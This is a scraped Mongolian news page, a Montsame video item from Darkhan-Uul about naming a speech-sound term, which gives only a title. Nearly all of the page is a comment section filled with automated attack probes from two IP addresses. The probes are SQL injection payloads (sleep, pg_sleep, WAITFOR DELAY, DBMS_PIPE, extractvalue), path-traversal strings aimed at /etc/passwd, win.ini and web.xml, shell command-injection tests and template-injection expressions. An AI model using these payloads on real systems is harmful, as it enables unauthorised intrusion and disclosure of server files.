ДАРХАН-УУЛ: "Тагнайн ташил" биш "Хэл, уруулын товшрого" гэх нь илүү оновчтой

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-01 17:17:30
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin 185.234.72.114 281 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',9)='t
 • admin 185.234.72.114 281 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',0)='e
 • admin 185.234.72.114 281 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('q',9)
 • admin 185.234.72.114 281 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('d',0)
 • admin 185.234.72.114 281 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:9
 • admin 185.234.72.114 281 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 281 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:9'/**/
 • admin 185.234.72.114 281 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 281 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(9))::text>'0
 • admin 185.234.72.114 281 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 281 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(9))>0/**/
 • admin 185.234.72.114 281 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 185.234.72.114 281 өдөр

  123456"and(select*from(select+sleep(9))a/**/union/**/select+1)="
 • admin 185.234.72.114 281 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 185.234.72.114 281 өдөр

  123456'and(select*from(select+sleep(9))a/**/union/**/select+1)='
 • admin 185.234.72.114 281 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 185.234.72.114 281 өдөр

  (select*from(select+sleep(9)union/**/select+1)a)
 • admin 185.234.72.114 281 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 281 өдөр

  123456"and"z"="q
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456"and"u"="u
 • ../../../../WEB-INF/web.xml 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456'and'v'='a
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456'and'a'='a
 • ../../../WEB-INF/web.xml 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456/**/and+4=7
 • ../../WEB-INF/web.xml;admin 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456/**/and+0=0
 • ../../WEB-INF/web.xml 185.234.72.114 281 өдөр

  123456
 • ../WEB-INF/web.xml;admin 185.234.72.114 281 өдөр

  123456
 • ../WEB-INF/web.xml 185.234.72.114 281 өдөр

  123456
 • WEB-INF/web.xml;admin 185.234.72.114 281 өдөр

  123456
 • WEB-INF/web.xml 185.234.72.114 281 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 281 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 281 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 281 өдөр

  123456
 • ./../../../../../../Windows/win.ini 185.234.72.114 281 өдөр

  123456
 • ../../../../../../Windows/win.ini 185.234.72.114 281 өдөр

  123456
 • admin'"\( 185.234.72.114 281 өдөр

  123456
 • admin鎈'"\( 185.234.72.114 281 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1765266268')))>'0 185.234.72.114 281 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1929644722'))) 185.234.72.114 281 өдөр

  123456
 • admin/**/and/**/cast(md5('1787917507')as/**/int)>0 185.234.72.114 281 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 281 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1602656632)as/**/int))>'0 185.234.72.114 281 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 281 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1450307157))) 185.234.72.114 281 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 281 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1032103417)))and" 185.234.72.114 281 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 281 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 281 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1194620130)))and' 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456'"\(
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',9)='a 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456鎈'"\(
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1031004423')))>'0
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',0)='q 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1049413820')))
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 281 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:9 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456/**/and/**/cast(md5('1671381474')as/**/int)>0
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456'and(select'1'from/**/cast(md5(1877933557)as/**/int))>'0
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  extractvalue(1,concat(char(126),md5(1414479056)))
 • admin'/**/and(select'1'from/**/pg_sleep(9))::text>'0 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1839543012)))and"
 • expr 970741498 + 862423590 185.234.72.114 281 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1000429103)))and'
 • admin&set /A 831292268+927800216 185.234.72.114 281 өдөр

  123456
 • admin"and(select*from(select+sleep(9))a/**/union/**/select+1)=" 185.234.72.114 281 өдөр

  123456
 • admin$(expr 837642769 + 938802409) 185.234.72.114 281 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 281 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 281 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 281 өдөр

  123456
 • admin|expr 878410362 + 954544102 185.234.72.114 281 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 281 өдөр

  123456
 • admin'and(select*from(select+sleep(9))a/**/union/**/select+1)=' 185.234.72.114 281 өдөр

  123456
 • <%- 884015390+851377141 %> 185.234.72.114 281 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 281 өдөр

  123456
 • %u2215etc%u2215passwd 185.234.72.114 281 өдөр

  123456
 • admin expr 968198277 + 952320817 185.234.72.114 281 өдөр

  123456
 • #set($c=878129889+909779599)${c}$c 185.234.72.114 281 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  expr 951229665 + 951273824
 • ${(997811229+907140303)?c} 185.234.72.114 281 өдөр

  123456
 • /etc/passwdadmin 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456&set /A 825795865+914020094
 • /etc/passwd 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456
 • ${902771131+993893007} 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456$(expr 819496479 + 975347368)
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 281 өдөр

  123456
 • admin"and"g"="s 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456|expr 889694574 + 805740598
 • /*1*/{{920442969+841414055}} 185.234.72.114 281 өдөр

  123456
 • admin"and"r"="r 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456 expr 917686372 + 877872111
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 281 өдөр

  123456
 • ./../../../../../../etc/passwd 185.234.72.114 281 өдөр

  123456
 • '-var_dump(md5(134645354))-' 185.234.72.114 281 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 281 өдөр

  123456
 • admin'and'r'='b 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  <%- 994395414+983275055 %>
 • ../../../../../../etc/passwd 185.234.72.114 281 өдөр

  123456
 • ${@var_dump(md5(862615895))}; 185.234.72.114 281 өдөр

  123456
 • admin'and'b'='b 185.234.72.114 281 өдөр

  123456
 • mhagmnkipkdhxrnxapom 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  #set($c=887444594+846004435)${c}$c
 • admin 185.234.72.114 281 өдөр

  '-var_dump(md5(445887411))-'
 • admin 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  ${(918406206+911952136)?c}
 • admin 185.234.72.114 281 өдөр

  mhagmnkipkdhxrnxapom
 • admin 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  ${956209803+880586459}
 • admin 185.234.72.114 281 өдөр

  123456
 • ${976918396+955047959} 185.234.72.114 281 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 281 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  /*1*/{{881460335+942561665}}
 • admin 185.234.72.114 281 өдөр

  ${@var_dump(md5(336204962))};
 • admin 185.234.72.114 281 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  123456
 • admin 185.234.72.114 281 өдөр

  ${833888876+975242439}
 • admin 185.234.72.114 281 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',11)='f
 • admin 194.163.191.42 282 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',0)='k
 • admin 194.163.191.42 282 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('y',11)
 • admin 194.163.191.42 282 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('n',0)
 • admin 194.163.191.42 282 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:11
 • admin 194.163.191.42 282 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 282 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:11'/**/
 • admin 194.163.191.42 282 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 282 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(11))::text>'0
 • admin 194.163.191.42 282 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 282 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(11))>0/**/
 • admin 194.163.191.42 282 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 282 өдөр

  123456"and(select*from(select+sleep(11))a/**/union/**/select+1)="
 • admin 194.163.191.42 282 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 194.163.191.42 282 өдөр

  123456'and(select*from(select+sleep(11))a/**/union/**/select+1)='
 • admin 194.163.191.42 282 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 282 өдөр

  (select*from(select+sleep(11)union/**/select+1)a)
 • admin 194.163.191.42 282 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 282 өдөр

  123456"and"b"="r
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456"and"k"="k
 • ../../../../WEB-INF/web.xml 194.163.191.42 282 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 282 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456'and'b'='i
 • ../../WEB-INF/web.xml;admin 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456'and'i'='i
 • ../../WEB-INF/web.xml 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456/**/and+1=5
 • ../WEB-INF/web.xml;admin 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456/**/and+2=2
 • ../WEB-INF/web.xml 194.163.191.42 282 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 282 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 282 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 282 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456'"\(
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456鎈'"\(
 • ./../../../../../../Windows/win.ini 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1228713202')))>'0
 • ../../../../../../Windows/win.ini 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1700942405')))
 • admin 194.163.191.42 282 өдөр

  123456/**/and/**/cast(md5('1385994134')as/**/int)>0
 • admin 194.163.191.42 282 өдөр

  123456'and(select'1'from/**/cast(md5(1184543303)as/**/int))>'0
 • admin 194.163.191.42 282 өдөр

  extractvalue(1,concat(char(126),md5(1069443746)))
 • admin 194.163.191.42 282 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1811056285)))and"
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1706457199)))and'
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 282 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 282 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 282 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 282 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 282 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 282 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 282 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',11)='e 194.163.191.42 282 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',0)='u 194.163.191.42 282 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:11 194.163.191.42 282 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 282 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 282 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 282 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(11))::text>'0 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  <%- 891299039+845746291 %>
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 282 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  #set($c=965790493+942742167)${c}$c
 • admin"and(select*from(select+sleep(11))a/**/union/**/select+1)=" 194.163.191.42 282 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 282 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  ${(956155504+841559605)?c}
 • admin'and(select*from(select+sleep(11))a/**/union/**/select+1)=' 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  ${828652631+955736703}
 • admin 194.163.191.42 282 өдөр

  /*1*/{{974981381+822404961}}
 • admin'"\( 194.163.191.42 282 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 282 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1053422643')))>'0 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1557535640'))) 194.163.191.42 282 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 282 өдөр

  123456
 • /etc/passwd 194.163.191.42 282 өдөр

  123456
 • admin/**/and/**/cast(md5('1056598197')as/**/int)>0 194.163.191.42 282 өдөр

  123456
 • expr 828097237 + 882861602 194.163.191.42 282 өдөр

  123456
 • admin"and"g"="s 194.163.191.42 282 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 282 өдөр

  123456
 • admin&set /A 971609897+844135310 194.163.191.42 282 өдөр

  123456
 • admin"and"w"="w 194.163.191.42 282 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 282 өдөр

  123456
 • admin'and'g'='p 194.163.191.42 282 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 282 өдөр

  123456
 • admin$(expr 978223563 + 951000511) 194.163.191.42 282 өдөр

  123456
 • admin'and'b'='b 194.163.191.42 282 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 282 өдөр

  123456
 • admin|expr 977093201 + 992028681 194.163.191.42 282 өдөр

  123456
 • '-var_dump(md5(461251519))-' 194.163.191.42 282 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1167663605)as/**/int))>'0 194.163.191.42 282 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1039354989))) 194.163.191.42 282 өдөр

  123456
 • ../../../../../../etc/passwd 194.163.191.42 282 өдөр

  123456
 • admin expr 893883178 + 997027726 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456
 • <%- 953711786+833957669 %> 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  expr 883751558 + 967817515
 • admin"and/**/extractvalue(1,concat(char(126),md5(1685611116)))and" 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  ${993734498+990450085}
 • admin 194.163.191.42 282 өдөр

  123456
 • ${@var_dump(md5(220048072))}; 194.163.191.42 282 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1356908073)))and' 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456&set /A 871779761+874688445
 • admin 194.163.191.42 282 өдөр

  '-var_dump(md5(722843858))-'
 • #set($c=811968520+949780224)${c}$c 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456$(expr 968494033 + 916238982)
 • ${913618461+857237891} 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456|expr 818534969 + 829827556
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456
 • ${(932577344+825212120)?c} 194.163.191.42 282 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 282 өдөр

  123456
 • ${952691939+862961750} 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456 expr 983007336 + 994547082
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 282 өдөр

  123456
 • vkupbuvylrbxzgfzmvjr 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  vkupbuvylrbxzgfzmvjr
 • /*1*/{{897406102+879980914}} 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  123456
 • admin 194.163.191.42 282 өдөр

  ${@var_dump(md5(692494795))};
 • admin 194.163.191.42 282 өдөр

  123456